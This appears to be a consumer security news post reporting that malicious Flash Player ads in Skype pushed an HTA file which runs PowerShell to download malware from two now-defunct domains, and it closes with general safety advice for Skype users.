According to several users’ complaints that recently appeared on Reddit and Twitter, the official Skype application pushed malicious Adobe Flash Player ads to users. It appears that users received a malicious ad right after logging into their Skype accounts, which suggested installing FlashPlayer.hta file. Now what happens next can shock you. If the user agrees to install it, thinking that a legitimate software like Skype suggests installing required piece of software or update, the malicious JavaScript code inserted into the .hta file runs a PowerShell script, which connects to a website that hosts malware and downloads it from there. Currently known domains that hosted the final payload were oyomakaomojiya(.)org and cievubeataporn(.)net. However, both domains were taken down quickly; therefore malware analysts were not able to reach them and download a sample of the malware from any of them.
Researchers also discovered that both domains were registered using email accounts that were used to set up numerous questionable websites, and IP addresses used to host some of them led to servers that were used to host even more infectious websites. Reportedly, these sites were used for malware distribution and helped to propagate malicious JavaScript files. If you didn’t know this yet, such files could deliver ransomware, Trojans, or other malicious programs right into your computer system.
It goes without saying that the attack against Skype users was carried out by a well-organized cyber crime gang. It seems that this group continuously registers new domains and shuts down the old ones daily, trying to keep malware researchers away from the malware samples they push to victims. Although no more malicious ads were spotted in the next few days, we recommend you to be careful and stay away from any suspicious ads that might appear on Skype. Make sure your anti-malware software is running, and if you want to be aware of tricks scammers use to attack Skype users, read this article about Skype viruses. Recently, a big number of users complained about a suspicious virus that hijacks their accounts and arbitrarily sends out odd baidu.com hyperlinks to all contacts.